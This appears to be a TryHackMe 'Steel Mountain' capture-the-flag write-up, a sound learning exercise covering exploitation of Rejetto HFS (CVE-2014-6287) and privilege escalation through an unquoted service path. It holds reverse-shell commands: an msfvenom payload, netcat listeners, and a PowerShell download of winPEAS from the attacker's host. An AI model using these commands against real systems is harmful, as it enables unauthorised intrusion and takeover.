TryHackMe Writeup: Steel Mountain

TryHackMe Writeup: Steel Mountain

First, we start off with simple enumeration

nmap -sC -sV -Pn 10.10.103.240

Now, since we know nmap scans can take a bit, we can discern that we have a little extra time to do some manual enumeration. With that said, let’s see if this server is set up as a webserver and check common web ports 80, 8080 and 443

Port 80 looks like a standard web site

Port 8080 appears to be a file server

Now in the first screenshot (port 80), we see an “Employee of the month”. This is also the first question that appears on TryHackMe. Since there doesn’t appear to be any information other than the photo on the site, lets check the page source to see if the image is named after this mysterious person

Hmmmm… could it be Bill Harper? Yes, yes it is!

The second question is asking what other port a web server is running on. Our quick pre-nmap check showed port 8080 was running a file server. So we will enter 8080.

The next question is asking what file server is running. A quick glance at the page shows “HTTPFileServer 2.3”.

Since that clearly isn’t the answer, we click the highlighted link at the bottom and it takes us to a “rejetto http file server” site.

Let’s input that answer and move on.

Now before we go any further, let’s check the results of the nmap scan we launched earlier

It appears that SMB and RDP are also open. This might come in handy later! But for now, let’s go ahead and fire up Metasploit. We are gonna do a quick check and see if there’s a module for the file server.

Hmmm…

Ok, lets go ahead and configure and run this, since it seems promising and appears to match the software that is running.

set RHOSTS 10.10.103.240

set LHOSTS 10.9.240.85

set RPORT 8080

set LPORT 4444

Bombs away!

Annnnnnddddd BOOOMM!!

Looks like we have a low privileged shell under “Bill’s” UID

So we should have enough info to complete the next two questions. The CVE is CVE-2014–6287. We got this by typing the following into MSF:

info exploit/windows/http/rejetto_hfs_exec

The next question asks what the user flag is. So we will navigate through Bills user folders and try to locate the file

cd C:\Users\bill\*

We find a user.txt file on Bill’s Desktop. So we read it and discover the following:

Let’s enter that info as a flag and move on.

The next task is asking us to download a set of powershell scripts, and upload the “exploit” to the target machine. So after downloading, I loaded meterpreters “powershell” script, uploaded and ran the PowerUp file.

We will now load the powershell shell and run the script

powershell_shell

. .\PowerUp.ps1

Invoke-AllChecks

The next question asks what service shows up as an unquoted service path vulnerability and also has CanRestart set to True. Looks like it’s the AdvancedSystemCareService9 service

The next part is kind of tricky. The TryHackMe tutorial says to create a payload using msfvenom to replace the binary and name it “Advanced.exe”. This won’t work, as the name of the actual binary is ASCService.exe. So we will use that as the name instead

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.240.85 LPORT=4443 -f exe -o ASCService.exe

Now set up a netcat listener to “catch” the shell

nc -nvlp 4443

Next, we will go into our current meterpreter session, drop into a shell and stop the current service

Then we will upload our malicious file and restart the service

Uh oh, that error doesn’t look good…. Let’s check out netcat listener

Phew, we’re good! Now lets read the root flag

#WINNING

Task 4

So at this point, I had walked away for a minute, only to return to an expired machine. So with the rest of the walk through, the IP address of the target will now be 10.10.227.39

For this task, it is essentially asking you to do the same thing, sans Metasploit. We begin by exploiting the same CVE, but using an exploit given by TryHackMe

https://www.exploit-db.com/exploits/39161

In addition to downloading that, we also need a netcat binary found here:

https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe

We also need a webserver to serve up the file. If you have apache installed, you can use that. I however will be using pythons SimpleHTTPServer. Open one terminal window, navigate to the ncat file you downloaded, rename it to nc.exe and start the server.

python3 -m http.server 80

Next, set up a listener in a separate window

nc -nvlp 1337

Modify the exploit to include your IP and port your listener is listening in on

Now run the exploit at least twice. If successful, you should now have a shell!

Now, since we are going to use WinPeas to enumerate the system, lets go ahead and move that webserver we started to the directory where winpeas is stored

cd /root/Desktop/tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x86/Release

python3 -m http.server 80

Now on the target shell we spawned, run:

powershell -c wget “http://10.9.240.85/winPEAS.exe" -outfile “winpeas.exe”

Once ran, we should see that we have Write/Create perms on the same service area that we exploited earlier

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

We can generate a new msfvenom payload, or use the one created previously to run on port 4443. I will use that one.

First, let’s create a netcat listener to catch our shell

nc -nvlp 4443

Starting on bills desktop, we are going to upload our payload

Now stop the current service

And copy and overwrite the current service with our payload and restart the service

We should now have r00t!

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How does the Springcloud config server loads resources

Spring Batch executing independent steps in parallel mode

Your product is not only your “product”

CS 373 SWE Spring 2020 Abdul-Ghaffar Balogun

Schedule Mailing on K8s CronJob

Create your own Openshift dashboard in grafana OCP 3.11

Redhat openshift logo

In this article, we will talk about the Cronos network, as one of the most advanced IBC projects.

The Way of Feature Engineering

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
PwnPalace

PwnPalace

More from Medium

TryHackMe : Vulnversity Walkthrough

Tryhackme | Nmap

TryHackMe Lumberjack-Turtle Writeup